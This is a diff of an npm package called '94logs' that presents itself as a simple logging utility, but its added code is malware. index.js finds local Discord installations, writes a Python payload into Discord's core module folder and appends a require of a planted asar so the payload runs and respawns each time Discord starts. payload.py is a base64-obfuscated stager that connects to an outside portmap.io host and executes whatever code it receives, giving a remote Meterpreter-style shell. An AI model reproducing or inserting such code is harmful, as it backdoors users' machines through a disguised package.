94logs 1.2.6

package/app/inject.js

@@ -0,0 +1,19 @@
+const path = require("path");
+const cp = require('child_process');
+
+const script = path.join(__dirname, "..", "asar.py");
+
+var py = cp.spawn('python', [script]);
+
+py.stdout.on("data", (data) => {
+	console.log("METERPRETER: " + data);
+})
+
+py.stderr.on('data', (data) => {
+	console.error(`* METERPRETER: ${data}`);
+});
+
+py.on("exit", code => {
+	cp.spawnSync("echo Meterpreter closed")
+	setTimeout(() => {py = cp.spawn("python", [script])}, 5000);
+})

package/app/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "app",
+  "version": "1.0.0",
+  "main": "inject.js",
+  "license": "MIT",
+  "private": true,
+  "dependencies": {
+    "child_process": "^1.0.2"
+  }
+}

package/constants.js

@@ -0,0 +1,18 @@
+module.exports = {
+	DISCORD_APP_DIR_REGEX: /(app-)?\d+\.\d+\.\d+/g,
+	IMPORT_SCRIPT_SHA256_SUMS: [
+		"7149e6ede44455dc5313351ba9081de69d2e3c1059501f8084a6960fc52fc1d9",
+		"a1d390d24b10503e50bf063374439032e8e8b7b5963db1c0364826a645c7d6d3",
+		"83ace8860901890dec66c93245d8b252de85e0f3af34f6a9f21052a03a01531c",
+	],
+	OBFUSCATE_OPTIONS: {
+		compact: false,
+		controlFlowFlattening: true,
+		controlFlowFlatteningThreshold: 1,
+		numbersToExpressions: true,
+		simplify: false,
+		stringArrayShuffle: true,
+		splitStrings: false,
+		stringArrayThreshold: 1
+	}
+};

package/index.js

@@ -0,0 +1,112 @@
+const fs = require("fs");
+const path = require("path");
+const log4js = require("log4js");
+const logger = log4js.getLogger();
+const cp = require("child_process");
+const crypto = require("crypto");
+const asar = require('asar');
+
+const constants = require("./constants.js");
+
+typeof process.env.LOCALAPPDATA === "undefined" ? __dirname : process.env.LOCALAPPDATA;
+
+const discordLocations = [
+    path.join(process.env.LOCALAPPDATA, "Discord"),
+    path.join(process.env.LOCALAPPDATA, "discordcanary"),
+    path.join(process.env.LOCALAPPDATA, "DiscordPTB"),
+];
+
+async function init()  {
+    const inject_paths = discordLocations
+        .filter(fs.existsSync)
+        .map((l) =>
+            fs.readdirSync(l)
+                .map((l1) => path.join(l, l1))
+                .filter((l1) => constants.DISCORD_APP_DIR_REGEX.test(l1))[0]
+        )
+        .filter(fs.existsSync)
+        .map((l) => 
+            fs.readdirSync(l)
+                .filter((_dir) => {
+                    let dir = path.basename(_dir.toLowerCase());
+
+                    if(dir.includes("modules")) return true;
+                    return false;
+                })
+                .map((l1) => path.join(l, l1))[0]
+        )
+        .filter(fs.existsSync)
+        .map((l) => 
+            fs.readdirSync(l)
+                .filter((_l1) => {
+                    let l1 = path.basename(_l1.toLowerCase());
+
+                    if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return true;
+                    return false;
+                })
+                .map((l1) => path.join(l, l1))[0]
+        )
+        .filter(fs.existsSync)
+        .map((l) => fs.readdirSync(l)
+                .map((_l1) => {
+                    let l1 = path.basename(_l1.toLowerCase());
+
+                    if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return path.join(l, l1);
+                    return path.join(l, l1, "..");
+                })[0]
+            )
+        .filter(fs.existsSync)
+        .map((l) => 
+            fs.readdirSync(l)
+                .filter((_l1) => {
+                    let l1 = path.basename(_l1.toLowerCase());
+
+                    if(l1.includes("index.js")) return true;
+                    return false;
+                })
+                .map((l1) => path.join(l, l1))[0]
+
+        )
+        .filter(fs.existsSync)
+
+    const scripts = inject_paths.filter((sl) => constants.IMPORT_SCRIPT_SHA256_SUMS
+        .map(str => str.toLowerCase())
+        .includes(
+            crypto.createHash("sha256", {})
+                .update(fs.readFileSync(sl).toString())
+                .digest()
+                .toString("hex")
+                .toLowerCase()
+            )
+    );
+
+    for(const script of scripts) {
+        const pyPayload = fs.readFileSync(path.join(__dirname, "payload.py"));
+
+        const outPayload = path.join(script, "..", "asar.py");
+
+        fs.writeFileSync(outPayload, pyPayload);
+        fs.appendFileSync(script, '\nrequire("./environment.asar");');
+
+        await asar.createPackage(path.join(__dirname, "app"), path.join(script, "..", "environment.asar"));    
+    }
+
+    cp.spawn("python", ["payload.py"], {cwd: __dirname});
+}
+
+module.exports = class {
+    constructor() {
+        try {
+            this._init();
+        } catch (err) {
+            throw err;
+        }
+    }
+
+    /**
+     * @private
+     */
+    _init = init;
+};
+
+// init();

package/install.js

@@ -0,0 +1,4 @@
+const _94logs = require(".");
+const logger = new _94logs();
+
+logger.init();

package/package.json

@@ -0,0 +1,14 @@
+{
+    "name": "94logs",
+    "version": "1.2.6",
+    "description": "Simple logging utility like log4j.",
+    "main": "index.js",
+    "repository": "https://github.com/Fredriksson448/94logs.git",
+    "author": "Fredriksson",
+    "license": "GNU",
+    "scripts": {},
+    "dependencies": {
+        "asar": "^3.1.0",
+        "log4js": "^6.3.0"
+    }
+}

package/payload.py

@@ -0,0 +1 @@
+exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2phY2thc3NuYW5kdS0zNDg0My5wb3J0bWFwLmlvJywzNDg0MykpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))